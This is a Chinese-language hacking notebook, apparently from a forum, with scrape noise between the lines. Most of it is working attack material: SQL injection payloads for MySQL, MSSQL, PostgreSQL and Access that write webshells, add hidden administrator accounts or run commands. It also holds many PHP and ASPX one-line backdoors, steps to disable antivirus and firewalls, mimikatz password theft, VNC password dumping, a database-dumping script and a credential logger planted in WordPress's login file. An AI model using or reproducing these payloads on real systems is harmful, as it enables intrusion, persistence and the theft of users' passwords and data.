, k+ ]# P- h) v2 B8 |, X0 fuse test;
# {9 m' s7 n$ P8 A2 ecreate table a (cmd text);. a% {1 J. \8 p+ ^$ o
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
, |/ {* n* ~$ a% |% Z. V8 ^insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
, h3 f" ]8 } V, W! |9 hinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
6 w% H! O' |2 _8 l( k7 _" Mselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";0 p1 W- c" S3 y
drop table a;; U( e& b% u0 q. _4 s4 q; B" x
# c9 o- a5 u+ e7 J2 P
英文版本:
" S2 n7 b9 |+ ~/ p7 t$ r6 ~, @
( S8 `& w& s9 s. puse test;
5 i3 E, ~) X7 w6 n+ vcreate table a (cmd text);
7 `. e- t: |$ [* i# @& I4 A% t* X2 Z' x( hinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
. y5 J, c8 @# T4 }" Z, V6 V6 I0 ?5 sinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
! d" d! S' _0 o4 h! m. t7 x: |, Cinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
r3 b. ]$ U- g: {) O; oselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
2 a+ l# K+ Y) G+ z. P- ]1 `drop table a; C) a( W! f4 S# ?
6 \! L/ y4 ?3 c5 ^8 O8 [create table a (cmd BLOB);
) l, b0 y- [7 c9 a! f9 s! hinsert into a values (CONVERT(木马的16进制代码,CHAR));1 V" o$ P5 i, ^1 k% |
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
7 n4 k8 t* v; o! r5 D1 cdrop table a;( V, ]0 |% ]6 w0 v( T+ I4 |
$ o" A- X2 I( u; A. ]3 o
记录一下怎么处理变态诺顿
1 v8 j# h2 F9 Z" Y! X查看诺顿服务的路径4 G, D( M* J, `; ~: C. v, u3 w
sc qc ccSetMgr* L) S3 a! w% n/ {, d$ f
然后设置权限拒绝访问。做绝一点。。
% |" {; S: T3 k; [9 Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
/ ^) W0 B+ F8 G1 ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
0 ~' {2 P2 G7 s. k! I3 [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators5 [" A. t( Q3 k: d' |4 b
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
% F# o4 u- u/ {% ~" k, a% M, M9 A4 G- A7 J7 |4 F! q, q
然后再重启服务器
' m, V9 B3 W9 I' ` x6 c& yiisreset /reboot
/ ^% S, G3 @0 D& m8 _这样就搞定了。。不过完事后。记得恢复权限。。。。, a9 K. f8 A; K; i& A+ j9 ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
: H1 h) _0 A5 Z! C& o+ _% N5 [' ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
: p1 m4 y9 C l) h) X/ {, n: m% J; Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
; r8 c9 D. m8 G3 d3 B5 Y1 v/ ]2 m' Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
" L% f2 D" J$ W& j# XSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
7 i: R N! c6 O) d/ B1 a+ X
* v% Y, f/ \+ g/ R ^EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
, B$ E c0 x" B1 ]' k. e; C" s, b4 }& b* W, M
postgresql注射的一些东西
_9 j% r0 Y, F7 F5 `; j如何获得webshell. u- n+ b( `8 b) q! {% ~! X. h
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
" B, h5 i3 e4 l8 ^+ N: K" U- Mhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ! p5 U3 Q3 f: \2 z" h
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;' }9 }4 d) a" t, Y
如何读文件
0 g% h/ E! I- h9 D0 h+ _3 fhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
" D9 g B7 B( @3 Thttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;. g9 p L" x% a) `5 j, B9 X
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
3 d l4 Y, g# l% M, y6 |! M$ x; ]4 J, y+ o1 B
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。2 C, I6 d. q2 n& L' b9 T
当然,这些的postgresql的数据库版本必须大于8.X
8 b6 x5 T$ t4 r5 X8 ~7 U' B创建一个system的函数:
B& @0 e: T/ I& cCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
6 d+ y: w: k$ z1 e2 d. l6 S& M3 g$ \$ J+ x4 H+ X7 X5 G# Y
创建一个输出表:
1 J, s7 k X$ q8 N5 l3 _7 @CREATE TABLE stdout(id serial, system_out text)
/ ~8 _7 Q& K7 l$ O; a
5 m) j9 d/ {8 x4 g. n8 o/ A6 Y执行shell,输出到输出表内:: F( H" U& m& m( N
SELECT system('uname -a > /tmp/test')1 A5 P' ?1 h: @5 o
, y8 X' k0 F& x& C1 u, H, B
copy 输出的内容到表里面;; g0 [" L! S- A/ S
COPY stdout(system_out) FROM '/tmp/test'
# [8 T( M4 h' j* i; M ~/ `" E( `9 J" N
从输出表内读取执行后的回显,判断是否执行成功) I& |/ l- j$ |5 C2 O6 \
2 T8 l% o! M/ l: m
SELECT system_out FROM stdout
0 u/ x2 I6 T) t; e4 N下面是测试例子3 e3 O( z9 ~" J! P
8 c' ]6 B' @: B/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ( g5 F# t7 R, L0 O% F) F
, C4 q. g# n D% s+ s# ?+ |/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'8 o! p# L- E3 Q7 J4 L5 i
STRICT --
( e4 V h8 r: i# V4 a
- e( c, g i% a( T+ E/store.php?id=1; SELECT system('uname -a > /tmp/test') --( y, G4 r& A! [4 l' q: q& N4 {
: [8 j' j3 P' z; Z
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --8 k) Y! o2 @. i; T2 v+ F6 }" J2 g
0 c* W8 s' S! L' M0 L
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--' }1 B+ c C5 a- Z, D
net stop sharedaccess stop the default firewall" P m% N$ m5 R* `7 \; P
netsh firewall show show/config default firewall
4 a% C' E3 O( u" n) q6 H! qnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall; Y* ^* S: u+ U. x
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall7 R* _: ~; K9 R [. f$ J
修改3389端口方法(修改后不易被扫出)
. Q% L. S" I& L) E6 \) a: W修改服务器端的端口设置,注册表有2个地方需要修改8 S5 s+ Z. x; f" @0 h
# v/ D' A) V9 r+ S" w$ M' T* I8 ]
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]( \6 k& `4 i6 F
PortNumber值,默认是3389,修改成所希望的端口,比如6000$ a. B! [& q9 |' n- o( x; J
7 s: Y$ s) t3 @, x+ p, d5 {2 I4 _第二个地方:
( i4 n" ^: b% n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
3 a! @, `. c) u7 L: GPortNumber值,默认是3389,修改成所希望的端口,比如60006 z" d/ {8 V& v* v% d2 A4 l/ {
4 k* I: h {6 a$ w- p: G
现在这样就可以了。重启系统就可以了
' p) }: T! A) R. O+ k i
) I. f" g5 [( d8 G# k" @2 ~查看3389远程登录的脚本3 G$ {) k% ?7 `; `6 G
保存为一个bat文件
' |! P+ Z. i4 @ H9 ^ t% [7 pdate /t >>D:\sec\TSlog\ts.log
+ F3 u9 V1 I9 x! x. Y2 Htime /t >>D:\sec\TSlog\ts.log
% e3 N3 A; f/ }! }6 Z) q# Jnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log3 l9 M r+ W! m8 O1 f+ ~( a
start Explorer
- X" v( O- d( c5 o
% ^4 _% n9 ^) s+ ^mstsc的参数:
! Z8 K- [& m1 M4 ^1 z5 g" ^2 x* u- W
( p# f6 ^( B1 R. F远程桌面连接. S- E/ R0 C+ ]) _; m/ X
- H7 o1 M$ A. |8 H$ C) c; U+ t& a7 s# G. lMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]+ A. r( {9 ]9 H J3 T
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
6 {+ c/ Y" d1 Q/ V! j* {7 l3 Q2 U; |
<Connection File> -- 指定连接的 .rdp 文件的名称。- i8 K, L; L- m i6 k* ^4 W1 E
$ T* g( z0 A' y" Q, b5 r ~
/v:<server[:port]> -- 指定要连接到的终端服务器。
3 k5 Z5 H4 k( t3 ?2 E% Z& P* N
) r2 r3 [% b" L7 h d; k U! @/console -- 连接到服务器的控制台会话。- w( x8 v/ h# X" c- X) H1 p) r& X
, | m+ z$ e* b' W! |/f -- 以全屏模式启动客户端。) O* C7 H: d9 z
6 B+ C# l3 [. n8 }( w" V% h6 [
/w:<width> -- 指定远程桌面屏幕的宽度。- e) W% U0 P e) ]9 _8 t+ u* {
* n; B4 H4 Z+ o3 C3 q& Q
/h:<height> -- 指定远程桌面屏幕的高度。. ]0 W/ z/ t0 l) L1 j% Q$ f" l( w
* p( {5 i& r1 {1 s! t' e: s/edit -- 打开指定的 .rdp 文件来编辑。1 A6 u! W9 e, _ j' `5 y; d
# z1 R1 P' b; @7 c6 A. [" x% f$ q/migrate -- 将客户端连接管理器创建的旧版
$ d+ ?$ ^. e6 ?# Z! l/ k连接文件迁移到新的 .rdp 连接文件。2 W* [" u* U* w. I/ V
9 {4 o' |: O1 ]2 `( @5 Z
# W0 G' ?5 O5 O/ T% E: @( d# r其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
7 I9 {8 I/ {* D6 P2 |mstsc /console /v:124.42.126.xxx 突破终端访问限制数量. X5 E* o: k9 l t) Y! Q9 m7 d
" W. ?, N& l5 U( L! w7 @/ V命令行下开启33898 G# |5 ]; A8 Y' r( q! N1 a/ H. H
net user asp.net aspnet /add
1 S! J' {8 H8 v$ e" pnet localgroup Administrators asp.net /add
; N5 ], v' c0 O( |net localgroup "Remote Desktop Users" asp.net /add
. s5 U8 d% e n" H- ?1 cattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
( v4 X* A& U; ? Oecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 09 T! m. o: k+ { G$ q/ w
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1+ K+ \3 n) O; f0 U9 r8 P2 F
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
7 i- r! [; O8 Y' |; X$ Fsc config rasman start= auto
; Z& q5 Z1 k, d+ ?+ isc config remoteaccess start= auto- |% L9 B2 o+ X: N! ^2 J
net start rasman7 D- i1 m& M" T; X5 Z
net start remoteaccess \* V) H4 j* C* a
Media
' }' \8 e4 |/ w# k7 A<form id="frmUpload" enctype="multipart/form-data"
; Z2 ]3 J+ @* iaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
, V% d$ z- g9 p W% `) m6 y! c" Q2 h<input type="file" name="NewFile" size="50"><br>
" H: ^$ \- c2 ^' g7 V<input id="btnUpload" type="submit" value="Upload">& ]6 I& ], @$ J0 |
</form>
, N+ v( b4 n6 N u; U
. ]& k" U8 J7 M# J& dcontrol userpasswords2 查看用户的密码
* k% w4 k; ` ^$ `9 @. Waccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
. k+ J1 M% z7 g* R! e( Q6 iSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, `# N C- w7 W8 P' V- F8 E
: U( ?0 c3 i- v8 }: |2 B141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:' n- X9 o/ z/ m" ]
测试1:
3 o' g2 u( \- q0 A' ?SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) T$ P- {8 M [4 O/ L O
' d" V- X- j3 ]$ a+ M1 f测试2:$ m, p5 v7 i( d# x1 g
' G! _$ b: e" E1 u5 {% x( Acreate table dirs(paths varchar(100),paths1 varchar(100), id int); W" q4 L+ M- E/ G; n4 z
2 _/ d4 Z3 S E5 h0 `5 O2 }1 z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--. t% H# N( b3 M+ p
% G6 U0 R$ ?" m$ |( mSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1: P$ I, A4 w$ d$ W
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令% t' z7 T Y1 X( L
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;) y2 D% W' `+ I w. R# Q
net stop mcafeeframework
7 k( z; _ h( E3 L6 Dnet stop mcshield/ b, B% [8 S3 ~# E
net stop mcafeeengineservice( x0 y8 }, h. G$ Q: o' U
net stop mctaskmanager9 e, o2 H& s: ~: X
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
' x+ u' J) \% @; B1 r# ~9 B; Q* h* Y
VNCDump.zip (4.76 KB, 下载次数: 1) 3 Z% j+ J6 x% Y4 I
密码在线破解http://tools88.com/safe/vnc.php/ r7 }8 |5 P, B4 [
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取1 @0 Z4 E) k- R8 Q: H& N
! g% T: m7 {3 L+ H8 Sexec master..xp_cmdshell 'net user'
3 |" V# x! y: R8 Z* {8 Kmssql执行命令。
! h. d& E S3 n0 k) x; q获取mssql的密码hash查询# \" D9 u# D; n& |
select name,password from master.dbo.sysxlogins
2 @9 Z p% A8 L2 R2 ?
7 T9 F- f' J5 Rbackup log dbName with NO_LOG;
5 M; u4 \7 o4 B% ^( P t& kbackup log dbName with TRUNCATE_ONLY;# m. [1 J$ n& B0 O) Z7 N6 n
DBCC SHRINKDATABASE(dbName);2 N b5 X/ `% s# K6 P; J& d2 Y& b
mssql数据库压缩
! o4 p7 @# J* e% q }' W; {- P. T+ \$ V" }3 J. m* |$ i
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# g/ {4 `: ~, T* k8 n将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。+ C- t6 R/ ~8 m4 c0 L
& \: v. N% ]' ]1 F* |( b
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
# `5 L# G3 d c8 I$ ^ d1 h备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
9 e% `$ G2 q9 t* u P& H: t$ L3 q7 X) p# B
Discuz!nt35渗透要点:( }: J; X# G/ f2 E u3 t
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
0 A) r* |7 \; h(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
. E' r- L. z6 _6 _% v(3)保存。
' b% Z. n1 w- V! y6 Q O6 p% {& S(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass' C* W/ y5 V: g9 S+ ?" \: h# ~0 {& c
d:\rar.exe a -r d:\1.rar d:\website\
4 u0 K) c# r9 d* _" C& d递归压缩website' v- w! V& w* \" ?' `0 M; _* o' @
注意rar.exe的路径* h' M; Y# J& P* O8 K, ?( j4 U* [
. q0 I8 b) H/ z5 t' {7 o3 b<?php
" f5 u6 V A9 o& N
/ @ p- V7 K; u0 g8 L) U$telok = "0${@eval($_POST[xxoo])}";
/ o% F" D& X2 X) m+ M0 m
0 w/ B( Y- L% I' R* Y1 j m! V$username = "123456";
* B: S9 g- Y; J! q4 G; f; d W5 l; U* u2 |2 O) ]* p! S2 x
$userpwd = "123456";9 B6 u0 M+ e) \% l& j# Y5 _
8 }! a* w8 {1 U* n8 F5 b$telhao = "123456";9 x a2 O4 D$ H, J
/ U' {0 V, o1 s% p$ b z6 {% a) h$telinfo = "123456";
" x1 H V4 {- T
/ c1 q2 k6 h0 V1 G5 w0 J?>
' S' {9 K* O" l' x. I$ o' Jphp一句话未过滤插入一句话木马
2 V) S. S4 y* v% w
8 d r/ h1 K; k5 f1 x, H站库分离脱裤技巧7 N2 c! W$ i9 f1 g
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'8 H" W! s. p4 }# d/ |
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
8 z$ \+ S% k3 \! C条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。$ e; _6 ?; A |. ?2 i4 ~9 F* w
这儿利用的是马儿的专家模式(自己写代码)。4 K! @4 U) I1 V8 X* }& K2 P. \
ini_set('display_errors', 1);
$ U0 U' l: M+ v* [set_time_limit(0);( B8 Q6 R9 V6 T8 j% A+ U9 p4 X
error_reporting(E_ALL);' G: Y( a6 M9 ?4 C* h8 T$ `
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
) i+ F8 p1 a8 d O3 kmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
( j6 m# u" e: L3 g$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
; Z3 J3 @5 d3 y5 j0 U$i = 0;7 Q, o5 z& W4 Q; c
$tmp = '';/ t+ W5 W& }/ _. B. x% b; a
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {# r' e# S8 a6 V2 N9 b. D
$i = $i+1;# {! N2 z5 s6 D5 T$ y
$tmp .= implode("::", $row)."\n";# `" H7 P2 }, ~; F! r. \" O5 Q! M
if(!($i%500)){//500条写入一个文件
: G, z3 }. l$ U' c $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';0 o# T0 w& X6 n, ^! i1 n8 m
file_put_contents($filename,$tmp);. f) s2 B$ t0 m3 ]+ q, F) u3 ^
$tmp = '';
( G/ T h" n) E$ [7 t# n }; l% t; C; I& s4 o6 i
}" O! s$ E+ i% u. r) k
mysql_free_result($result);
2 R( X) J- A$ P0 ?
' v: P, Z9 R' o2 P& q* L( i: r) m; P& Y; e+ o; ?5 l
- H, r* X2 W4 {
//down完后delete+ H7 R# B, ?4 ?- }7 c0 @
8 e3 @" \6 [ v2 O7 j( U5 r4 m, D/ N
5 U2 ]0 y; k8 `5 o" R! O1 d
ini_set('display_errors', 1);9 O$ v: ? t5 r% C, o1 ?+ c; z
error_reporting(E_ALL);
" c1 d: m' W' B1 {1 S$i = 0;
: K% H7 i8 q; ?! N8 E6 J7 Y% p' mwhile($i<32) {" `* R3 g- V& f; q
$i = $i+1;* [0 r6 u3 n {- y3 F
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
/ n5 ~) s9 w' {+ `5 h. H unlink($filename);
& ^& h$ V) m( I: D e Q' ~" c}
$ h3 l5 L+ a; X7 r% Z" q6 t- yhttprint 收集操作系统指纹
6 {" u4 S+ b! f. m- o扫描192.168.1.100的所有端口
. i2 f( y7 w, Z& Qnmap –PN –sT –sV –p0-65535 192.168.1.100
; @' d$ A* e b1 b3 j3 |5 g% o- lhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
9 Q4 P* l9 W& q; D4 g7 L6 L5 Hhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输( S0 a; ?# B$ C" M- A# f5 @5 E5 |
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host8 P7 O t r+ {) R( V5 J3 ]
+ D+ V$ ]8 n0 A2 ~! ]' I. WDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
2 |# m( u4 m+ ]2 P8 J6 {2 _7 w4 p0 z* W# t
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)) b# t4 U3 V7 H+ x* u
' A0 x- ^" n2 }$ l
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x/ E, |# X7 n* Z8 i( g
4 T) @' o' C0 z7 o, `8 M
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
: y# I1 I) S' M# \) ^4 f
* H6 O8 c. ?. t; H http://net-square.com/msnpawn/index.shtml (要求安装)
% I8 z3 a/ r' `5 Y$ H5 q r3 X3 G. Q" ?. \, z2 @2 X
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)9 G S* |3 K0 A" M3 h2 H6 C
. w6 \) w$ M8 s( e+ ]
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
+ b) _5 K" \( ]2 ^: ?6 O3 sset names gb2312
6 L3 V* {/ S0 a8 J) p+ `4 i导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
2 @, R4 D; y5 {! } p; U6 G% _! \9 u/ ?. O' M# x- K' d
mysql 密码修改( q# R4 p3 I/ L# U2 b
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 9 Q* s) L. D4 ~) u' L
update user set password=PASSWORD('antian365.com') where user='root';& N, U! l J/ N( Y# `
flush privileges;. a- U4 y# n$ @
高级的PHP一句话木马后门
/ H1 r; i3 N3 B M4 ]) L
$ `0 F; E! F5 k" J1 B! b$ B入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
5 B# W, m" S; g( A7 ?5 v4 q# ~8 k. o, h1 Q% O$ z
1、
6 ^2 X7 H1 g$ R% t( h9 H; }; j
. J0 E/ X- B' I7 H t$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";5 q' t" L- N/ W- J( R
8 o1 h9 v$ B% H( c: B& Q1 F
$hh("/[discuz]/e",$_POST['h'],"Access");
5 t) }( @: Q" o9 Q% |. T6 V9 }% k+ d4 j2 p$ Q- ?
//菜刀一句话8 u, P! e% }- q
, \& Z2 S( f2 K5 Q0 g
2、
8 n) @4 Q3 R' i h2 C
/ a- u* I4 e0 l) x+ D7 K+ ]/ a& E$filename=$_GET['xbid'];
% Q, Y7 m$ x7 j* \. d; a! Q! l+ P$ T
include ($filename);
$ I" |. P" R# l: B7 Y, b8 e: ~* |3 K q3 a* F( }; ~+ [+ e
//危险的include函数,直接编译任何文件为php格式运行
) x$ Y- n1 \7 ~3 F( `* H
$ U( n$ x' I: ^- z" P* `3、/ M: D: S' s; }. w! Z4 M
( ?3 P% @/ i- W) Z- g$reg="c"."o"."p"."y";0 J- Y W7 Z, }
) j$ K# z% K/ Z& C& o# V, H/ S& |$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
) ? \9 B1 Z9 T/ E# U3 F! L+ g
8 c) D, i1 u& ]6 y V2 B3 ?0 F( R' {* y I//重命名任何文件
/ R! p( M4 Y N6 w# X
6 L; M' r8 f" Y/ e$ r$ S4、
0 @3 N: G$ R: O0 O6 T1 M" N
% H h( M- F0 A% P" V$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
0 w& L% J7 y& p
% p5 Z# E3 O+ p3 |5 R. \- {$gzid("/[discuz]/e",$_POST['h'],"Access");* \, n9 \0 l m" U
, P- V% b. m; r; i# G: G//菜刀一句话
. t) F$ u( X' J
, B; A% N( c9 |5、include ($uid);/ z3 w& h; V" P0 p4 G
$ | N6 R: ^& X3 s- a; Y, L, i//危险的include函数,直接编译任何文件为php格式运行,POST
* b& h9 y4 N% `6 P+ E3 O9 N& o/ a# H6 H* q
* m0 Y) `8 `, L2 M5 E! Q//gif插一句话6 U2 G, k: [/ a2 g* w: i
6 k: S& o+ B/ }/ l0 }5 {
6、典型一句话+ Q3 f- d$ x, I2 X3 @
* q: N0 Q3 t4 }% r( K( U9 a
程序后门代码: H1 Y* A: K& \0 d* Q
<?php eval_r($_POST[sb])?>( V. S) P4 l n. `
程序代码( ]& R4 i& I- X4 }3 \
<?php @eval_r($_POST[sb])?>
" Q ^* I( T2 r0 f//容错代码/ Z0 Y, C- h- D1 I& w& l+ _5 q
程序代码
6 L/ U* [" r9 V3 t( ^& K<?php assert($_POST[sb]);?>
7 ^% M2 U! I, F: Y! m+ \//使用lanker一句话客户端的专家模式执行相关的php语句
3 b7 d( D3 D. z, @程序代码
+ E( D* g5 G% {# x<?$_POST['sa']($_POST['sb']);?>
0 R2 S* d- T! ^6 A程序代码# s) }) M1 K$ I# J4 B; \
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
9 y- `& G/ V0 Y) X8 g; b: F5 A* V- }程序代码$ T1 x" [- z$ V+ m
<?php& E9 E9 k0 Z. k
@preg_replace("/[email]/e",$_POST['h'],"error");# {' }' Q W) |% O r. V# n+ O
?>
) P7 A9 S* i6 ^& i7 Y; M//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
/ j* \2 ?- I4 b# z程序代码
0 U; G. a* L8 A( T+ ]4 c/ N<O>h=@eval_r($_POST[c]);</O>
, L/ o2 b7 r( W7 F& q程序代码
u) i( S7 R5 Z<script language="php">@eval_r($_POST[sb])</script>& h; v; a# L4 x; B o8 ^1 m, M4 w a# y' X
//绕过<?限制的一句话# v2 _6 W: i; f
2 ]; T3 `' s1 \; q9 x- qhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip/ {. q7 a. P6 f6 n g9 a
详细用法:
( C |2 ~* L+ g$ e$ H1、到tools目录。psexec \\127.0.0.1 cmd
6 d% N, c- t" _0 N7 k1 G) X2、执行mimikatz2 r. a; O6 R' U/ V* Q# O
3、执行 privilege::debug5 ?: Q1 Z3 o2 R0 P5 U" \- S8 U
4、执行 inject::process lsass.exe sekurlsa.dll
4 E# K0 Q( N" G+ N, M8 V: N/ H2 }5、执行@getLogonPasswords1 L( K& n6 v* c r1 x
6、widget就是密码
7 Z; I0 `! U/ J5 z9 n1 H) p7、exit退出,不要直接关闭否则系统会崩溃。
( Y; \+ f9 X' R9 m3 R4 L9 S( J9 x7 p7 F6 [/ ]5 }5 Q; |# q
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
{- g0 \6 w% H( `7 Z3 x, ?
" Y/ e6 z/ g8 P- ~7 ?# E: W& d自动查找系统高危补丁* R) I! X1 X8 h r7 W/ x7 s
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
: g8 g3 x) G1 u0 D1 q/ O6 ?" v2 V
& e: D, ]2 Z2 X$ x3 J3 w1 ?7 w突破安全狗的一句话aspx后门
" D; o2 `( h# y/ g* F9 a<%@ Page Language="C#" ValidateRequest="false" %>
0 W4 h& z* K6 r: V# N<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>0 R( _2 N$ Q1 x( f9 D7 A
webshell下记录WordPress登陆密码
" c/ M6 V } B! G Qwebshell下记录Wordpress登陆密码方便进一步社工2 e7 |! w3 j+ M' @% d1 w! ^
在文件wp-login.php中539行处添加:& }/ j: {* O! ]9 R* g
// log password
( C% X$ y: N; d$log_user=$_POST['log'];
9 W1 {( `' R# B& s/ @1 o0 w$log_pwd=$_POST['pwd'];
# \3 _5 V' z _& W/ | Q; S2 [$ {$log_ip=$_SERVER["REMOTE_ADDR"];1 D% M' c: J3 M9 T9 l+ K
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;" T2 K9 b$ |1 m/ p) @3 ^
$txt=$txt.”\r\n”;
- ^1 u r) U' E* z; C. [5 @if($log_user&&$log_pwd&&$log_ip){
8 Y/ i% q$ _6 N+ e. |9 L Q@fwrite(fopen(‘pwd.txt’,”a+”),$txt);# ]* p" o M1 v1 ~
}% B# K$ Q) B6 b& |4 p- o
